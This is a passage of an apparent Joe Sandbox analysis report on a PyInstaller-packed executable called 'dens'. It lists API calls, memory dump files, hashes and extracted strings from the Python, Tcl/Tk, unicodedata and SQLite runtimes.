                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F589B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58B4
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58C6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58DF
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58F1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F590D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F591F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F593B
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F594D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5969
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F597B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5997
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59A9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59C5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59D7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction ID: 6619931e63b14310192cb118969e6357bb73a3435b4290c8dd8125c1c6dcdb6d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3022DA6490DF0B99FE15CB5DBC6A5B823B0AF247B5F541035C81E82260FFBDB189924B
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction ID: 9b42112f5a6de7e26e6b0482f864bc7eddc8e5a0b83c699868f5fd35e10688a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D02C664A0DB17D9FE15EB5DBC1A5B82375AF28774F540035D82E82660FFBCB1898207
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF62C0F86B7,?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F822C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                              • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                              • Instruction ID: c4a4301164b462cb6397726c5f45bbea8ec773880fba7c5bfdc6f11441fe4b33
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B951F610A2DA4288FF51EB28EC562FE2361AF957A0F544431DE0EC26D5EFBDF045834A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                              • Opcode ID: 10ad1ac658e299a32776e4f5c7df64e1b6feaa7ef6c238e08fbfef3a4424164a
                                                                                                                                                                                                                                              • Instruction ID: 670ebc5e103c052e2094edc188542366070cb4a3a4dd7a192199f55c72247a30
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10ad1ac658e299a32776e4f5c7df64e1b6feaa7ef6c238e08fbfef3a4424164a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851F361B0864796EE10AB299C461B923A0BF44BB4F444131EE0CC77D6DF3DF9A5C346
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CompareUnicode_$DeallocStringWith
                                                                                                                                                                                                                                              • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                              • API String ID: 1004266020-3528878251
                                                                                                                                                                                                                                              • Opcode ID: 1585b7f006c3bc3ef317b73109392006e48ef7fb1c9bb5363a1940f6ac4bfac5
                                                                                                                                                                                                                                              • Instruction ID: 1bb56ce85a6170cbf0410102c12cf497e75c5cd1e9653a74ff44ca7443c2300c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1585b7f006c3bc3ef317b73109392006e48ef7fb1c9bb5363a1940f6ac4bfac5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20416125B086038AEB5C9B11A870A3977A6BF45BC4F8440B5DA6E477DCDF2DE04A9308
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Module_$DeallocObjectObject_$ConstantFromSpecStringTrackTypeType_
                                                                                                                                                                                                                                              • String ID: 15.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                                                                                                                                                                                                              • API String ID: 2663085338-4141011787
                                                                                                                                                                                                                                              • Opcode ID: 35f2a36de3bf8fc04aa01d781381661ddda8c4355416510f682401fb826b2ab5
                                                                                                                                                                                                                                              • Instruction ID: 014cd119ab306fdf0fc2288ea292f8441c62734d5a03cb1dc796add6da610929
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35f2a36de3bf8fc04aa01d781381661ddda8c4355416510f682401fb826b2ab5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40312D25F18A0399E71D5B21DC34A7832A5BF49B90F9840B4D92E466DDDE6CE40E8308
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                                                                                                                                                                                                              • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                              • API String ID: 1723213316-3528878251
                                                                                                                                                                                                                                              • Opcode ID: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                                              • Instruction ID: ff11c8a9c53d2a19944ee3ca85aed121d89ff6724793bb84932215bb7bb49fc8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F51A025F0C6438AFB69AB25A470E3D3290AF51BC0F0451B1D96E87ACDDF2CE40B8708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: $%04X$a unicode character$argument$decomposition
                                                                                                                                                                                                                                              • API String ID: 1318908108-4056541097
                                                                                                                                                                                                                                              • Opcode ID: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                                              • Instruction ID: 879030ecdb9cee80fa19b6e581e022b3566b2d0577b2035cc147f2d83a91ba25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D41B6A1B08A829AEB288B14E834BB973A1FF55754F440275D97E476C8DF2CD54EC304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFABBD940: memcpy.VCRUNTIME140 ref: 00007FFDFABBDAE7
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFABBD440: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD59A
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFABBD440: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD617
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140 ref: 00007FFDFAC24B42
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                                                                                                                                                                                                              • API String ID: 3510742995-2234786739
                                                                                                                                                                                                                                              • Opcode ID: 788232bee9104a0cd9c319c12bad25031100ac734658960405c14a196bff1add
                                                                                                                                                                                                                                              • Instruction ID: fa405fb04897252829675dde9403c305925683d7a51ca931cb7a09698a3bda6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 788232bee9104a0cd9c319c12bad25031100ac734658960405c14a196bff1add
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BB18B7AB08B818AE728CF25D560AAE37F5EB49788F044276DE6C077C9DB79D054CB04
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 46fc1f4ccb1474852cc9f4fe89bbc49f8b1fa66c052088270278482ea0f44b78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351E876604BA186DA349F2AF8181BAB7A1F798B61F004125EFDF83694DF7CD085DB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 58c842badf6d958e47ae5fd5c628e2b6cd9f2abeeaf88c6d44f8f795cbda9130
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1219161B09A8286EF458B7EBC491796254FF99FB0F584331DE2EC3394DF6CD590820A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
